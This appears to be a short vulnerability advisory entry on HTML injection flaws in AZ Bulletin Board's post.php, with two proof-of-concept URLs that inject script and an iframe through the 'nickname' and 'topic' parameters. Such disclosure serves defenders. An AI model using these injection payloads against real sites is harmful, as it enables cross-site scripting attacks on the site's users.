• info
• discussion
• exploit
• solution
• references

AZ Bulletin Board Post.PHP HTML Injection Vulnerabilities



An exploit is not required.

The following proof of concepts are available:

http://www.example.com/post.php?nickname="><script>alert('XSS')</script><!--

http://www.example.com/post.php?topic=>"<br><iframe%20src=javascript:alert()><br>"